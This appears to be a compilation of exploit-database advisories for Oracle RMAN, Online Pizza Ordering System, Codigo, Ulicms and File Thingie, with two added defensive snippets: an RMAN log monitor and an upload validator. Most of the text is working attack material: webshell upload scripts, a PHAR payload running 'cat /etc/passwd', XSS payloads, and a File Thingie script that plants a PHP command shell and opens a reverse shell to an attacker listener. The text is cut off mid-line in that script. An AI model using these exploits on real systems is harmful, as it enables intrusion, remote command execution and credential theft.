<pre><code>Title: CVE-2020-2978 - Oracle RMAN Audit table point in time recovery not recorded<br />Product: Database<br />Manufacturer: Oracle<br />Affected Version(s): 12.1.0.2, 12.2.0.1, 18c, 19c<br />Tested Version(s): 19c<br />Risk Level: Medium<br />Score: 4.1<br />Solution Status: Fixed<br />CVE Reference: CVE-2020-2978<br />Author of Advisory: Emad Al-Mousa<br /><br />Overview:<br /><br />Audit failure is a security weakness in a software product, especially when a security audit is in place to detect a specific operation. Oracle RMAN is<br />the database Recovery Manager utility for backup and restore operations, so any security weakness or vulnerability in it can be exploited by an insider threat or<br />an external attacker to view confidential data in an unauthorized manner.<br /><br />*****************************************<br />Vulnerability Details:<br /><br />The scope of this security research is to detect whether a database administrator tried to restore a "sensitive table" (auditing of SELECT statements against this sensitive table is already configured). <br />The following research illustrates that although RMAN operations are audited by "default" in pure "Unified Auditing" mode, the table point-in-time recovery action was not logged in the audit logs. 
<br />As a result, the audit trail needed for future forensic investigation or real-time security operations monitoring of activities against a highly confidential sensitive table is not available.<br /><br /><br />*****************************************<br />Proof of Concept (PoC):<br /><br />// I will check first if the Unified Auditing feature is enabled in the Oracle database system:<br /><br />SQL> select value from v$option where parameter ='Unified Auditing';<br /> <br />VALUE<br />----------------------------------------------------------------<br />TRUE<br /> <br /> <br />SQL> select * from DBA_AUDIT_MGMT_CONFIG_PARAMS where PARAMETER_NAME = 'AUDIT WRITE MODE';<br /> <br />PARAMETER_NAME<br />------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br />PARAMETER_VALUE<br />------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br />AUDIT_TRAIL<br />----------------------------<br />AUDIT WRITE MODE<br />IMMEDIATE WRITE MODE<br />UNIFIED AUDIT TRAIL<br /><br /><br />// I will create a Linux shell script to restore a sensitive database table under a different name; you will need to access the Linux OS as the DBA Linux account<br />for the exploit to work. The sensitive table is called "dummy" under a schema called "DBA" and the attacker will restore it under a different name ---><br />dummy_55:<br /> <br />touch /tmp/dbtest/resotre.sh<br /><br />chmod 700 /tmp/dbtest/resotre.sh<br /><br />vi /tmp/dbtest/resotre.sh<br /> <br />#!/bin/sh<br />export ORACLE_SID=dbtest<br />export ORACLE_HOME=/orcl/dbtest/product/18.3<br />export RMAN_LOG_FILE=/tmp/dbtest/aux_db/db_restore.log<br />RMAN=$ORACLE_HOME/bin/rman<br />CMD_STR="<br />ORACLE_HOME=$ORACLE_HOME<br />export ORACLE_HOME<br />ORACLE_SID=$ORACLE_SID<br />export ORACLE_SID<br />$RMAN target \/ msglog $RMAN_LOG_FILE append << EOF<br />connect CATALOG $RCVCAT_CONNECT_STR<br />run {<br />recover table dba.dummy<br />#until scn 56330407409<br />until time \"to_date('23-JAN-2020 08:00:00','DD-MON-YYYY HH24:MI:SS')\"<br />auxiliary destination '/tmp/dbtest/aux_db'<br />remap table dba.dummy:dummy_55;<br />}<br />EOF<br />"<br />/usr/bin/sh -c "$CMD_STR" >> $RMAN_LOG_FILE<br /><br />// then run the shell script:<br /><br />/tmp/dbtest/resotre.sh<br /> <br /> <br />// Log File /tmp/dbtest/aux_db/db_restore.log shows the restore is successful:<br /> <br />auxiliary instance file /tmp/dbtest/aux_db/JTVB_PITR_dbtest/onlinelog/o1_mf_1_h2lopldq_.log deleted<br />auxiliary instance file /tmp/dbtest/aux_db/JTVB_PITR_dbtest/datafile/o1_mf_ts_user__h2locvjr_.dbf deleted<br />auxiliary instance file /tmp/dbtest/aux_db/dbtest/datafile/o1_mf_sysaux_h2lncb1c_.dbf deleted<br />auxiliary instance file /tmp/dbtest/aux_db/dbtest/datafile/o1_mf_ts_undo__h2lnlrw7_.dbf deleted<br />auxiliary instance file /tmp/dbtest/aux_db/dbtest/datafile/o1_mf_system_h2lncb14_.dbf deleted<br />auxiliary instance file /tmp/dbtest/aux_db/dbtest/datafile/o1_mf_system_h2lncbvp_.dbf deleted<br />auxiliary instance file /tmp/dbtest/aux_db/dbtest/controlfile/o1_mf_h2ln7ftc_.ctl deleted<br />auxiliary instance file tspitr_jtvb_19868.dmp deleted<br />Finished recover at 01/23/2020-11:19:30<br /> <br />RMAN> RMAN><br /> <br />Recovery Manager complete.<br /><br /><br />// you can now access the sensitive table and query data:<br /><br />sqlplus / as sysdba<br /><br />SQL> select * from dba.dummy_55;<br /><br />// Checking the unified audit trail:<br /> <br />SQL> select EVENT_TIMESTAMP, ACTION_NAME, RMAN_SESSION_STAMP, RMAN_OPERATION,RMAN_OPERATION,RMAN_OBJECT_TYPE<br />from unified_audit_trail where ACTION_NAME like '%RMAN%' order by 1;<br /> <br />The RMAN session is logged in the audit table, but there are NO details of what kind of RMAN operation took place ?!<br /><br />Conclusion:<br /><br />A system administrator or attacker can view sensitive data without being audited, which impacts forensic investigation and threat detection.<br /><br /><br /><br />*****************************************<br />References:<br />https://www.oracle.com/security-alerts/cpujul2020.html<br />https://nvd.nist.gov/vuln/detail/CVE-2020-2978<br />https://databasesecurityninja.wordpress.com/2020/12/01/cve-2020-2978-rman-audit-table-point-in-time-recovery-not-logged/<br /><br /><br /></code></pre>
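The unified audit trail above records that an RMAN session ran but not what it did, so a compensating control is to watch the RMAN message log itself (the msglog file the restore script appends to). The following parser is an added example, not part of the advisory or of Oracle's tooling: it scans RMAN log text for `recover table` blocks, collects the `remap table`, `until` and `auxiliary destination` clauses, and raises an alert when a watched table is recovered. The log text is a constructed sample modelled on the script and db_restore.log output shown above.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional, Set

# Constructed sample of an RMAN msglog, modelled on the advisory's restore
# script and its db_restore.log output (not a real log file).
SAMPLE_RMAN_LOG = """\
Recovery Manager: Release 19.0.0.0.0 - Production on Thu Jan 23 11:10:02 2020
connected to target database: DBTEST (DBID=1234567890)
RMAN> run {
2> recover table dba.dummy
3> #until scn 56330407409
4> until time "to_date('23-JAN-2020 08:00:00','DD-MON-YYYY HH24:MI:SS')"
5> auxiliary destination '/tmp/dbtest/aux_db'
6> remap table dba.dummy:dummy_55;
7> }
Starting recover at 01/23/2020-11:10:05
auxiliary instance file tspitr_jtvb_19868.dmp deleted
Finished recover at 01/23/2020-11:19:30
RMAN> RMAN>
Recovery Manager complete.
"""


@dataclass
class TablePitrEvent:
    """One 'recover table' block found in an RMAN message log."""
    source_tables: List[str] = field(default_factory=list)
    remaps: List[str] = field(default_factory=list)
    until_clause: Optional[str] = None
    aux_destination: Optional[str] = None
    started: Optional[str] = None
    finished: Optional[str] = None


PROMPT_RE = re.compile(r"^(?:RMAN>\s*|\d+>\s*)+")
RECOVER_TABLE_RE = re.compile(r"\brecover\s+table\s+([\w$#.]+(?:\s*,\s*[\w$#.]+)*)", re.I)
REMAP_RE = re.compile(r"\bremap\s+table\s+([\w$#.]+:[\w$#]+)", re.I)
UNTIL_RE = re.compile(r"\buntil\s+(time|scn)\s+(.+?)\s*;?\s*$", re.I)
AUX_RE = re.compile(r"\bauxiliary\s+destination\s+'([^']+)'", re.I)
START_RE = re.compile(r"^Starting recover at (\S+)")
FINISH_RE = re.compile(r"^Finished recover at (\S+)")


def strip_prompt(line: str) -> str:
    # msglog prefixes interactive input with "RMAN> " and "2> " style prompts.
    return PROMPT_RE.sub("", line.strip())


def parse_rman_log(text: str) -> List[TablePitrEvent]:
    """Extract every table point-in-time recovery block from RMAN log text."""
    events: List[TablePitrEvent] = []
    current: Optional[TablePitrEvent] = None
    for raw in text.splitlines():
        line = strip_prompt(raw)
        if not line or line.startswith("#"):   # RMAN treats '#' as a comment
            continue
        m = RECOVER_TABLE_RE.search(line)
        if m:
            current = TablePitrEvent(
                source_tables=[t.strip().lower() for t in m.group(1).split(",")])
            events.append(current)
            continue
        if current is None:
            continue
        if (m := REMAP_RE.search(line)):
            current.remaps.append(m.group(1).lower())
        elif (m := UNTIL_RE.search(line)):
            current.until_clause = f"{m.group(1).lower()} {m.group(2)}"
        elif (m := AUX_RE.search(line)):
            current.aux_destination = m.group(1)
        elif (m := START_RE.match(line)):
            current.started = m.group(1)
        elif (m := FINISH_RE.match(line)):
            current.finished = m.group(1)
    return events


def sensitive_recoveries(events: List[TablePitrEvent], watchlist: Set[str]) -> List[str]:
    """Return one alert string per event that touches a watched (schema.table) name."""
    watched = {w.lower() for w in watchlist}
    alerts = []
    for ev in events:
        hit = sorted(set(ev.source_tables) & watched)
        if hit:
            alerts.append(
                f"table point-in-time recovery of {', '.join(hit)}"
                f" remapped to {', '.join(ev.remaps) or '(no remap)'}"
                f" until {ev.until_clause or '(unspecified)'}"
                f" finished {ev.finished or '(not finished)'}")
    return alerts


if __name__ == "__main__":
    for alert in sensitive_recoveries(parse_rman_log(SAMPLE_RMAN_LOG), {"DBA.DUMMY"}):
        print("ALERT:", alert)
```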
<pre><code># Exploit Title: Online Pizza Ordering System 1.0 - Unauthenticated File Upload<br /># Date: 03/05/2023<br /># Exploit Author: URGAN <br /># Vendor Homepage: https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html<br /># Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-opos.zip<br /># Version: v1.0<br /># Tested on: LAMP Fedora Server 27 (Twenty Seven) Apache/2.4.34 (Fedora) 10.2.19-MariaDB PHP 7.1.23 <br /># CVE: CVE-2023-2246<br /><br />#!/usr/bin/env python3<br /># coding: utf-8<br /><br />import os<br />import requests<br />import argparse<br />from bs4 import BeautifulSoup<br /><br /># command line arguments<br />parser = argparse.ArgumentParser()<br />parser.add_argument('-u', '--url', type=str, help='URL with http://')<br />parser.add_argument('-p', '--payload', type=str, help='PHP webshell')<br />args = parser.parse_args()<br /><br /># if no arguments are passed, ask the user for them<br />if not (args.url and args.payload):<br />    args.url = input('Enter URL with http://: ')<br />    args.payload = input('Enter file path PHP webshell: ')<br /><br /># URL Variables<br />url = args.url + '/admin/ajax.php?action=save_settings'<br />img_url = args.url + '/assets/img/'<br /><br />filename = os.path.basename(args.payload)<br /><br />files = [<br />    ('img', (filename, open(args.payload, 'rb'), 'application/octet-stream'))<br />]<br /><br /># send a POST request to the server<br />resp_upl = requests.post(url, files=files)<br />status_code = resp_upl.status_code<br />if status_code == 200:<br />    print('[+] File uploaded')<br />else:<br />    print(f'[-] Error {status_code}: {resp_upl.text}')<br />    raise SystemExit(f'[-] Script stopped due to error {status_code}.')<br /><br /># send a GET request to the server<br />resp_find = requests.get(img_url)<br /><br /># Use BeautifulSoup to parse the page's HTML code<br />soup = BeautifulSoup(resp_find.text, 'html.parser')<br /><br /># get all <a> tags on a page<br />links = soup.find_all('a')<br /><br /># list to store found files<br />found_files = []<br /><br /># we go through all the links and look for the desired file by its name<br />for link in links:<br />    file_upl = link.get('href')  # may be None for an anchor without href<br />    if file_upl and file_upl.endswith(filename):  # uploaded file name<br />        print('[+] Uploaded file found:', file_upl)<br />        file_url = img_url + file_upl  # get the full URL of your file<br />        found_files.append(file_url)  # add the file to the list of found files<br /><br /># if the list is not empty, then display all found files<br />if found_files:<br />    print('[+] Full URL of your file:')<br />    for file_url in found_files:<br />        print('[+] ' + file_url)<br />else:<br />    print('[-] File not found')<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: Codigo Markdown Editor v1.0.1 (Electron) - Arbitrary Code Execution<br /># Date: 2023-05-03<br /># Exploit Author: 8bitsec<br /># Vendor Homepage: https://alfonzm.github.io/codigo/<br /># Software Link: https://github.com/alfonzm/codigo-app<br /># Version: 1.0.1<br /># Tested on: [Mac OS 13]<br /><br />Release Date:<br />=============<br />2023-05-03<br /><br />Product & Service Introduction:<br />================================<br />A Markdown editor & notes app made with Vue & Electron<br /><br />Technical Details & Description:<br />=================================<br /><br />A vulnerability was discovered on Codigo markdown editor v1.0.1 allowing a user to execute arbitrary code by opening a specially crafted file.<br /><br />Proof of Concept (PoC):<br />=======================<br /><br />Arbitrary code execution:<br /><br />Create a markdown file (.md) in any text editor and write the following payload:<br /><video><source onerror="alert(require('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator').toString());"><br /><br />Opening the file in Codigo will auto execute the Calculator application.<br /><br /></code></pre>
<pre><code>#Exploit Title: Ulicms-2023.1 sniffing-vicuna - Remote Code Execution (RCE)<br />#Application: Ulicms<br />#Version: 2023.1-sniffing-vicuna<br />#Bugs: RCE<br />#Technology: PHP<br />#Vendor URL: https://en.ulicms.de/<br />#Software Link: https://www.ulicms.de/content/files/Releases/2023.1/ulicms-2023.1-sniffing-vicuna-full.zip<br />#Date of found: 04-05-2023<br />#Author: Mirabbas Ağalarov<br />#Tested on: Linux <br /><br />2. Technical Details & POC<br />========================================<br />steps: <br /><br />1. Login to account and edit profile.<br /><br />2.Upload new Avatar<br /><br />3. It is possible to include the php file with the phar extension when uploading the image. Rce is triggered when we visit it again. File upload error may occur, but this does not mean that the file is not uploaded and the file location is shown in the error<br /><br />payload: <?php echo system("cat /etc/passwd"); ?><br /><br />poc request :<br /><br />POST /dist/admin/index.php HTTP/1.1<br />Host: localhost<br />Content-Length: 1982<br />Cache-Control: max-age=0<br />sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"<br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: "Linux"<br />Upgrade-Insecure-Requests: 1<br />Origin: http://localhost<br />Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYB7QS1BMMo1CXZVy<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Referer: http://localhost/dist/admin/index.php?action=admin_edit&id=12&ref=home<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: 64534366316f0_SESSION=g9vdeh7uafdagkn6l8jdk2delv<br />Connection: close<br 
/><br />------WebKitFormBoundaryYB7QS1BMMo1CXZVy<br />Content-Disposition: form-data; name="csrf_token"<br /><br />e2d428bc0585c06c651ca8b51b72fa58<br />------WebKitFormBoundaryYB7QS1BMMo1CXZVy<br />Content-Disposition: form-data; name="sClass"<br /><br />UserController<br />------WebKitFormBoundaryYB7QS1BMMo1CXZVy<br />Content-Disposition: form-data; name="sMethod"<br /><br />update<br />------WebKitFormBoundaryYB7QS1BMMo1CXZVy<br />Content-Disposition: form-data; name="avatar"; filename="salam.phar"<br />Content-Type: application/octet-stream<br /><br /><?php echo system("cat /etc/passwd"); ?><br /><br />------WebKitFormBoundaryYB7QS1BMMo1CXZVy<br />Content-Disposition: form-data; name="edit_admin"<br /><br />edit_admin<br />------WebKitFormBoundaryYB7QS1BMMo1CXZVy<br />Content-Disposition: form-data; name="id"<br /><br />12<br />------WebKitFormBoundaryYB7QS1BMMo1CXZVy<br />Content-Disposition: form-data; name="firstname"<br /><br />account1<br />------WebKitFormBoundaryYB7QS1BMMo1CXZVy<br />Content-Disposition: form-data; name="lastname"<br /><br />account1<br />------WebKitFormBoundaryYB7QS1BMMo1CXZVy<br />Content-Disposition: form-data; name="email"<br /><br />account1@test.com<br />------WebKitFormBoundaryYB7QS1BMMo1CXZVy<br />Content-Disposition: form-data; name="password"<br /><br /><br />------WebKitFormBoundaryYB7QS1BMMo1CXZVy<br />Content-Disposition: form-data; name="password_repeat"<br /><br /><br />------WebKitFormBoundaryYB7QS1BMMo1CXZVy<br />Content-Disposition: form-data; name="group_id"<br /><br />1<br />------WebKitFormBoundaryYB7QS1BMMo1CXZVy<br />Content-Disposition: form-data; name="secondary_groups[]"<br /><br />1<br />------WebKitFormBoundaryYB7QS1BMMo1CXZVy<br />Content-Disposition: form-data; name="homepage"<br /><br /><br />------WebKitFormBoundaryYB7QS1BMMo1CXZVy<br />Content-Disposition: form-data; name="html_editor"<br /><br />ckeditor<br />------WebKitFormBoundaryYB7QS1BMMo1CXZVy<br />Content-Disposition: form-data; name="admin"<br 
/><br />1<br />------WebKitFormBoundaryYB7QS1BMMo1CXZVy<br />Content-Disposition: form-data; name="default_language"<br /><br /><br />------WebKitFormBoundaryYB7QS1BMMo1CXZVy<br />Content-Disposition: form-data; name="about_me"<br /><br /><br />------WebKitFormBoundaryYB7QS1BMMo1CXZVy--<br /><br /><br /><br />response:<br /><br />Error<br />GmagickException: No decode delegate for this image format (/var/www/html/dist/content/tmp/645364e62615b.phar) in /var/www/html/dist/vendor/imagine/imagine/src/Gmagick/Imagine.php:67<br />Stack trace:<br />#0 /var/www/html/dist/vendor/imagine/imagine/src/Gmagick/Imagine.php(67): Gmagick->__construct()<br />#1 /var/www/html/dist/App/non_namespaced/User.php(1110): Imagine\Gmagick\Imagine->open()<br />#2 /var/www/html/dist/App/non_namespaced/User.php(1089): User->processAvatar()<br />#3 /var/www/html/dist/content/modules/core_users/controllers/UserController.php(124): User->changeAvatar()<br />#4 /var/www/html/dist/App/non_namespaced/Controller.php(82): UserController->updatePost()<br />#5 /var/www/html/dist/App/non_namespaced/ControllerRegistry.php(67): Controller->runCommand()<br />#6 /var/www/html/dist/admin/index.php(66): ControllerRegistry::runMethods()<br />#7 {main}<br /><br />Next Imagine\Exception\RuntimeException: Unable to open image /var/www/html/dist/content/tmp/645364e62615b.phar in /var/www/html/dist/vendor/imagine/imagine/src/Gmagick/Imagine.php:73<br />Stack trace:<br />#0 /var/www/html/dist/App/non_namespaced/User.php(1110): Imagine\Gmagick\Imagine->open()<br />#1 /var/www/html/dist/App/non_namespaced/User.php(1089): User->processAvatar()<br />#2 /var/www/html/dist/content/modules/core_users/controllers/UserController.php(124): User->changeAvatar()<br />#3 /var/www/html/dist/App/non_namespaced/Controller.php(82): UserController->updatePost()<br />#4 /var/www/html/dist/App/non_namespaced/ControllerRegistry.php(67): Controller->runCommand()<br />#5 /var/www/html/dist/admin/index.php(66): 
ControllerRegistry::runMethods()<br />#6 {main}<br /><br /><br />4. Go to /var/www/html/dist/content/tmp/645364e62615b.phar (http://localhost/dist/content/tmp/645364e62615b.phar)<br /> <br /><br /><br /></code></pre>
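Both the Online Pizza Ordering System upload and the Ulicms avatar upload above accept a file by its client-supplied name and write it under the web root before (or without) checking that it is an image; the Ulicms stack trace shows the .phar already sitting in content/tmp when Imagine rejects it. The function below is an added example, not code from either project, of the checks a defender puts in front of such an endpoint: an authentication gate, an extension allowlist applied to every extension segment, a magic-byte check against the declared image type, and a random server-side filename.

```python
import os
import secrets
from dataclasses import dataclass
from typing import List, Optional

ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif"}

# Leading bytes each allowed image type must start with.
MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}


@dataclass
class UploadDecision:
    accepted: bool
    reason: str
    stored_name: Optional[str] = None   # random name to write under, never the client's


def extension_segments(filename: str) -> List[str]:
    """Every dot-separated extension of the base name, lowercased.

    'shell.php.png' -> ['php', 'png'] so a double extension cannot hide behind
    the last segment; directory components are discarded first.
    """
    base = os.path.basename(filename.replace("\\", "/"))
    return [p.lower() for p in base.split(".")[1:]]


def validate_upload(filename: str, content: bytes, authenticated: bool,
                    max_bytes: int = 2_000_000) -> UploadDecision:
    """Decide whether an uploaded 'image' may be stored, and under what name.

    Run this before the bytes touch any directory the web server can serve;
    the Ulicms trace above shows the file landing in content/tmp first.
    """
    if not authenticated:
        # The Pizza Ordering endpoint is reachable without a session at all.
        return UploadDecision(False, "unauthenticated")
    if "\x00" in filename:
        return UploadDecision(False, "null byte in filename")
    if len(content) > max_bytes:
        return UploadDecision(False, "file too large")

    exts = extension_segments(filename)
    if not exts:
        return UploadDecision(False, "no extension")
    disallowed = [e for e in exts if e not in ALLOWED_EXTENSIONS]
    if disallowed:
        # Catches .phar, .php, .phtml and also shell.php.png style names.
        return UploadDecision(False, f"disallowed extension(s): {', '.join(disallowed)}")

    ext = exts[-1]
    if not content.startswith(MAGIC[ext]):
        return UploadDecision(False, f"content does not match {ext} signature")
    if b"<?php" in content or b"<?=" in content:
        # Defence in depth: a real image never needs a PHP open tag.
        return UploadDecision(False, "embedded script tag")

    stored = f"{secrets.token_hex(16)}.{ext}"
    return UploadDecision(True, "ok", stored)
```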
<pre><code>#Exploit Title: Ulicms-2023.1 sniffing-vicuna - Stored Cross-Site Scripting (XSS)<br />#Application: Ulicms<br />#Version: 2023.1-sniffing-vicuna<br />#Bugs: Stored Xss<br />#Technology: PHP<br />#Vendor URL: https://en.ulicms.de/<br />#Software Link: https://www.ulicms.de/content/files/Releases/2023.1/ulicms-2023.1-sniffing-vicuna-full.zip<br />#Date of found: 04-05-2023<br />#Author: Mirabbas Ağalarov<br />#Tested on: Linux <br /><br />2. Technical Details & POC<br />========================================<br />steps: <br /><br />1. Go to media then to file (http://localhost/dist/admin/index.php?action=files)<br />2. upload malicious svg file<br /><br />svg file content ===><br /><br /><?xml version="1.0" standalone="no"?><br /><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><br /><br /><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"><br /> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/><br /> <script type="text/javascript"><br /> alert(document.location);<br /> </script><br /></svg><br /><br /><br />poc request:<br /><br />POST /dist/admin/fm/upload.php HTTP/1.1<br />Host: localhost<br />Content-Length: 663<br />sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"<br />Accept: application/json, text/javascript, */*; q=0.01<br />Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryK3CvcSs8xZwzABCl<br />X-Requested-With: XMLHttpRequest<br />sec-ch-ua-mobile: ?0<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36<br />sec-ch-ua-platform: "Linux"<br />Origin: http://localhost<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Dest: empty<br />Referer: http://localhost/dist/admin/fm/dialog.php<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: last_position=%2F; 
64534366316f0_SESSION=g9vdeh7uafdagkn6l8jdk2delv<br />Connection: close<br /><br />------WebKitFormBoundaryK3CvcSs8xZwzABCl<br />Content-Disposition: form-data; name="fldr"<br /><br /><br />------WebKitFormBoundaryK3CvcSs8xZwzABCl<br />Content-Disposition: form-data; name="files[]"; filename="SVG_XSS.svg"<br />Content-Type: image/svg+xml<br /><br /><?xml version="1.0" standalone="no"?><br /><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><br /><br /><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"><br /> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/><br /> <script type="text/javascript"><br /> alert(document.location);<br /> </script><br /></svg><br />------WebKitFormBoundaryK3CvcSs8xZwzABCl--<br /><br /><br /><br />3. Go to http://localhost/dist/content/SVG_XSS.svg<br /><br /></code></pre>
<pre><code>#!/usr/bin/python<br /><br /># Exploit Title: File Thingie 2.5.7 - Remote Code Execution (RCE)<br /># Google Dork: N/A<br /># Date: 27th of April, 2023<br /># Exploit Author: Maurice Fielenbach (grimlockx) - Hexastrike Cybersecurity UG (haftungsbeschränkt)<br /># Software Link: https://github.com/leefish/filethingie<br /># Version: 2.5.7<br /># Tested on: N/A<br /># CVE: N/A<br /><br /># Vulnerability originally discovered / published by Cakes<br /># Reference: https://www.exploit-db.com/exploits/47349<br /># Run a local listener on your machine and you're good to go<br /><br /><br />import os<br />import argparse<br />import requests<br />import random<br />import string<br />import zipfile<br />from urllib.parse import urlsplit, urlunsplit, quote<br /><br /><br />class Exploit:<br />    def __init__(self, target, username, password, lhost, lport):<br />        self.target = target<br />        self.username = username<br />        self.password = password<br />        self.lhost = lhost<br />        self.lport = lport<br /><br />    def try_login(self) -> bool:<br />        self.session = requests.Session()<br /><br />        post_body = {"ft_user": f"{self.username}", "ft_pass": f"{self.password}", "act": "dologin"}<br />        response = self.session.post(self.target, data=post_body)<br /><br />        if response.status_code == 404:<br />            print(f"[-] 404 Not Found - The requested resource {self.target} was not found")<br />            return False<br /><br />        elif response.status_code == 200:<br /><br />            if "Invalid username or password" in response.text:<br />                print("Invalid username or password")<br />                return False<br /><br />            return True<br /><br />    def create_new_folder(self) -> bool:<br />        # Generate random string<br />        letters = string.ascii_letters<br />        self.payload_filename = "".join(random.choice(letters) for i in range(16))<br />        headers = {"Content-Type": "application/x-www-form-urlencoded"}<br />        post_body = {"type": "folder", "newdir": f"{self.payload_filename}", "act": "createdir", "dir": "", "submit": "Ok"}<br /><br />        print(f"[*] Creating new folder /{self.payload_filename}")<br />        response = self.session.post(self.target, headers=headers, data=post_body)<br /><br />        if f"index.php?dir=/{self.payload_filename}" in response.text:<br />            print(f"[+] Created new folder /{self.payload_filename}")<br />            return True<br /><br />        else:<br />            print(f"[-] Could not create new folder /{self.payload_filename}")<br />            return False<br /><br />    def create_payload(self) -> bool:<br />        try:<br />            with zipfile.ZipFile(f"{self.payload_filename}.zip", 'w', compression=zipfile.ZIP_DEFLATED) as zip_file:<br />                zip_file.writestr(f"{self.payload_filename}.php", "<?php if(isset($_REQUEST[\'cmd\'])){ echo \"<pre>\"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo \"</pre>\"; die; }?>")<br />            print(f"[+] Zipped payload to {self.payload_filename}.zip")<br />            return True<br />        except Exception:<br />            print(f"[-] Could not create payload to {self.payload_filename}.zip")<br />            return False<br /><br />    def upload_payload(self) -> bool:<br />        # Set up the HTTP headers and data for the request<br />        headers = {<br />            b'Content-Type': b'multipart/form-data; boundary=---------------------------grimlockx'<br />        }<br /><br />        post_body = (<br />            '-----------------------------grimlockx\r\n'<br />            'Content-Disposition: form-data; name="localfile-1682513975953"; filename=""\r\n'<br />            'Content-Type: application/octet-stream\r\n\r\n'<br />        )<br /><br />        post_body += (<br />            '\r\n-----------------------------grimlockx\r\n'<br />            'Content-Disposition: form-data; name="MAX_FILE_SIZE"\r\n\r\n'<br />            '2000000\r\n'<br />            '-----------------------------grimlockx\r\n'<br />            f'Content-Disposition: form-data; name="localfile"; filename="{self.payload_filename}.zip"\r\n'<br />            'Content-Type: application/zip\r\n\r\n'<br />        )<br /><br />        # Read the zip file contents and append them to the data<br />        with open(f"{self.payload_filename}.zip", "rb") as f:<br />            post_body += ''.join(map(chr, f.read()))<br /><br />        post_body += (<br />            '\r\n-----------------------------grimlockx\r\n'<br />            'Content-Disposition: form-data; name="act"\r\n\r\n'<br />            'upload\r\n'<br />            '-----------------------------grimlockx\r\n'<br />            'Content-Disposition: form-data; name="dir"\r\n\r\n'<br />            f'/{self.payload_filename}\r\n'<br />            '-----------------------------grimlockx\r\n'<br />            'Content-Disposition: form-data; name="submit"\r\n\r\n'<br />            'Upload\r\n'<br />            '-----------------------------grimlockx--\r\n'<br />        )<br /><br />        print("[*] Uploading payload to the target")<br /><br />        response = self.session.post(self.target, headers=headers, data=post_body)<br /><br />        if f"<a href=\"./{self.payload_filename}/{self.payload_filename}.zip\" title=\"Show {self.payload_filename}.zip\">{self.payload_filename}.zip</a>" in response.text:<br />            print("[+] Uploading payload successful")<br />            return True<br /><br />        else:<br />            print("[-] Uploading payload failed")<br />            return False<br /><br />    def get_base_url(self) -> str:<br />        url_parts = urlsplit(self.target)<br />        path_parts = url_parts.path.split('/')<br />        path_parts.pop()<br />        base_url = urlunsplit((url_parts.scheme, url_parts.netloc, '/'.join(path_parts), "", ""))<br />        return base_url<br /><br />    def unzip_payload(self) -> bool:<br />        print("[*] Unzipping payload")<br />        headers = {"Content-Type": "application/x-www-form-urlencoded"}<br />        post_body = {"newvalue": f"{self.payload_filename}.zip", "file": f"{self.payload_filename}.zip", "dir": f"/{self.payload_filename}", "act": "unzip"}<br />        response = self.session.post(f"{self.target}", headers=headers, data=post_body)<br /><br />        if f"<p class='ok'>{self.payload_filename}.zip unzipped.</p>" in response.text:<br />            print("[+] Unzipping payload successful")<br />            print(f"[+] You can now execute commands by opening {self.get_base_url()}/{self.payload_filename}/{self.payload_filename}.php?cmd=<command>")<br />            return True<br /><br />        else:<br />            print("[-] Unzipping payload failed")<br />            return False<br /><br />    def execute_payload(self) -> bool:<br />        print("[*] Trying to get a reverse shell")<br /><br />        cmd = quote(f"php -r \'$sock=fsockopen(\"{self.lhost}\",{self.lport});system(\"/bin/bash <&3 >&3 2>&3\");\'")<br />        print("[*] Executing payload")<br /><br />        response = self.session.get(f"{self.get_base_url()}/{self.payload_filename}/{self.payload_filename}.php?cmd={cmd}")<br />        print("[+] Exploit complete")<br /><br />        return True<br /><br />    def cleanup_local_files(self) -> bool:<br />        if os.path.exists(f"{self.payload_filename}.zip"):<br />            os.remove(f"{self.payload_filename}.zip")<br />            print("[+] Cleaned up zipped payload on local machine")<br />            return True<br /><br />        print("[-] Could not clean up zipped payload on local machine")<br />        return False<br /><br /><br />if __name__ == "__main__":<br />    parser = argparse.ArgumentParser()<br />    parser.add_argument("-t", "--target", dest="target", type=str, required=True, help="Target URL to ft2.php")<br />    parser.add_argument("-u", "--username", dest="username", type=str, required=True, help="FileThingie username")<br />    parser.add_argument("-p", "--password", dest="password", type=str, required=True, help="FileThingie password")<br />    parser.add_argument("-L", 